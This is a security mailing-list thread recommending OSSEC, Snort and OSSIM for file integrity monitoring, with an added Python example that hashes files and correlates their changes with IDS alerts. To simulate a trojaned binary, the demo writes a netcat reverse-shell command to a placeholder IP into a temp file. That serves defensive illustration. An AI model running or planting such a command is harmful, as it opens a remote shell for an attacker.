I would recommend OSSEC all the way; a joint effort with your IDS, such
as Snort, helps greatly. To reduce the false incidents I agree with Ron
100%: you need a means to compare events, such as a file change and an
event on the network.
OSSEC is a great start though. If you want something inexpensive you can
look at OSSIM (http://www.alienvault.com/community.php?section=Home);
while the recent release is better, the overall documentation is not
the greatest and it does bundle into the OS things that may not be
needed for your implementation, so plan some time for tweaking and testing.
Keep us up to date as to what you guys choose and how it works out for you.
- Robert
(arch3angel)
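The correlation Robert describes above (a file change only counts as an incident when something on the network lines up with it) as an added worked example. This is not code from the thread, from OSSEC or from Snort; it is a stand-alone Python sketch that assumes file-integrity and IDS alerts have already been normalized into the simple dicts shown (timestamp, host, path or signature), and the sample events are constructed for illustration. It also includes the baseline hash-and-diff step that any file integrity monitor performs, so the two halves can be run together.

```python
"""Added example: hash-baseline file integrity checks correlated with IDS events.

Assumptions (not from the original thread): FIM and IDS alerts are already
parsed into dicts with the keys used below; timestamps share one clock.
"""
import hashlib
import os
import tempfile
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%d %H:%M:%S"


def build_baseline(root):
    """Hash every regular file under root. Returns {relative_path: sha256hex}."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                baseline[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return baseline


def diff_baseline(old, new):
    """Compare two baselines. Returns sorted [(path, 'added'|'removed'|'modified')]."""
    changes = []
    for path in sorted(set(old) | set(new)):
        if path not in old:
            changes.append((path, "added"))
        elif path not in new:
            changes.append((path, "removed"))
        elif old[path] != new[path]:
            changes.append((path, "modified"))
    return changes


def correlate(fim_events, net_events, window=timedelta(minutes=10)):
    """For each file change, look for IDS events on the same host that fired
    within `window` *before* the change. A hit means the change deserves a
    look now; no hit means it can wait for the normal change-review queue."""
    results = []
    for f in fim_events:
        f_ts = datetime.strptime(f["ts"], TS_FMT)
        hits = []
        for n in net_events:
            if n["host"] != f["host"]:
                continue
            n_ts = datetime.strptime(n["ts"], TS_FMT)
            if timedelta(0) <= f_ts - n_ts <= window:
                hits.append(n["sig"])
        results.append({
            "host": f["host"],
            "path": f["path"],
            "verdict": "investigate" if hits else "review-at-leisure",
            "ids_hits": hits,
        })
    return results


# Constructed sample alerts; hosts, paths, signatures and times are invented.
FIM_EVENTS = [
    {"ts": "2010-03-12 14:58:03", "host": "web01", "path": "/var/www/html/index.php"},
    {"ts": "2010-03-12 03:10:44", "host": "web02", "path": "/usr/bin/openssl"},
]
NET_EVENTS = [
    {"ts": "2010-03-12 14:57:50", "host": "web01", "sig": "WEB-PHP remote file include attempt"},
    {"ts": "2010-03-12 09:00:00", "host": "web02", "sig": "SCAN nmap TCP"},  # after the change: no match
]


def demo_baseline():
    """Build a baseline in a temp tree, change it, and return the diff."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, "bin", "tool"), "wb") as fh:
            fh.write(b"#!/bin/sh\necho ok\n")
        before = build_baseline(root)
        # Simulate a trojaned binary plus a new config file.
        with open(os.path.join(root, "bin", "tool"), "wb") as fh:
            fh.write(b"#!/bin/sh\nnc -e /bin/sh 203.0.113.7 4444\n")
        with open(os.path.join(root, "etc", "new.conf"), "wb") as fh:
            fh.write(b"x=1\n")
        after = build_baseline(root)
    return diff_baseline(before, after)


if __name__ == "__main__":
    for change in demo_baseline():
        print("baseline change:", change)
    for r in correlate(FIM_EVENTS, NET_EVENTS):
        print(r["host"], r["path"], "->", r["verdict"], r["ids_hits"])
```

The window is deliberately one-sided: an IDS signature that fires after the file changed does not vouch for the change, so `web02` stays in the low-priority queue while `web01`, whose `index.php` changed seconds after a remote-file-include alert, is flagged. Vendor patch runs would show up as many `review-at-leisure` entries with no IDS hits, which is the bucket you can compare against a change ticket rather than page on.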
On 3/12/2010 3:02 PM, Kennith Asher wrote:
Greetings gurus-
The company I work for is being pressed to deploy file integrity
monitoring tools in our production environment. I've not worked with
such tools in the past and am interested in your experiences.
I have concerns around noise levels, false positives, how to control
file integrity and still keep up with vendor updates (50 hour days
anyone?).
Anyone have any recommendations?
Thanks,
Ken
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com